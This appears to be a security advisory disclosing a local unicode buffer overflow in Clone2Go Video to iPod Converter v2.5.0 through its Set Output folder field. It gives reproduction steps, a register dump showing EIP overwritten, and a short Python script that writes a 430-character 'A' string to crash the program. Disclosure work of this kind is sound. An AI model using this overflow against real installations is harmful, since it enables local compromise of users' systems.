A classic local unicode buffer overflow vulnerability has been discovered in the official Clone2Go Video to iPod Converter v2.5.0 software. The vulnerability allows local attackers to gain higher system or access privileges by exploitation of a classic unicode buffer overflow vulnerability.
Local attackers with low- privilege system user account or restricted system privileges are able to compromise the local system by exploitation of a classic unicode buffer overflow vulnerability. The local attacker copies a specific byte size string to the options index files input to overflow the process and overwrite the registers like ECX,EBX or EIP. Thus allows the local attacker to takeover the system process of the software client to compromise the local system/server.
[+] Menu > Edit > Options > Set Output folder (Input)
Product & Service Introduction:
Video to iPod Converter is a powerful and easy-to-use iPod video conversion software tool for Apple iPod fans. With this video converter for iPod, you can convert videos in almost any popular video format, including AVI, WMV, ASF, MOV, MP4, RM, RMVB, FLV, MKV, AVS, MPG, VOB for playback on the new iPod touch, iPod classic, iPod nano 5G with camera.
(Copy of the Vendor Homepage: http://www.clone2go.com/)
Date of Discovery:
Solution – Fix & Patch:
Restrict the Set Output folder input by size and allocate the memory to deny to overflow the process by interaction with the vulnerable input field.
Levels Risk :
Proof of Concept (PoC):
The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ... 1. Install the software and start the client 2. Copy the AAAA...string from bof.txt to clipboard 3. Run VideoConverter.exex 4. Go Menu Menu > Edit > Options > Set Output folder (Input) 5. Paste it the input AAAA....string and click Open 6. A messagebox opens click ok 7. Software will stable crash or shut down 8. Successful reproduce of the local buffer overflow vulnerability! --- Registers --- EAX 8B368BC6 ECX 00410041 VideoCon.00410041 <--- Overwrite EDX 76F16CCD ntdll.76F16CCD EBX 00410041 VideoCon.00410041 <--- Overwrite ESP 00123600 EBP 00123628 ESI 8B368BC6 EDI 00000000 EIP 00410041 VideoCon.00410041 <--- Overwrite --- Code Python --- #!/usr/bin/python buffer = "\x41" * 430 poc = buffer file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX" print " Email: firstname.lastname@example.org"